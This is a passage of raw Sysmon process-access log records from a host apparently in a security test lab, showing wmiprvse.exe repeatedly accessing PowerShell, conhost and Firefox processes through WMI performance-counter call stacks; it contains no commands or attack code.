21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6701-00000000D101}1880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151926Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5801-00000000D101}1968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151925Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5801-00000000D101}1968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151924Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5701-00000000D101}416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151923Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5701-00000000D101}416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151922Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-144D-60CA-3801-00000000D101}2868C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151921Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-144D-60CA-3801-00000000D101}2868C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151920Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3601-00000000D101}4536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151919Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3601-00000000D101}4536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151918Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3501-00000000D101}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151917Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3501-00000000D101}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151916Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1321-60CA-1001-00000000D101}2680C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151915Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1321-60CA-1001-00000000D101}2680C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151914Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0F01-00000000D101}1408C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151913Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0F01-00000000D101}1408C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151912Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0E01-00000000D101}1072C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151911Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0E01-00000000D101}1072C:\Program Files\Mozilla 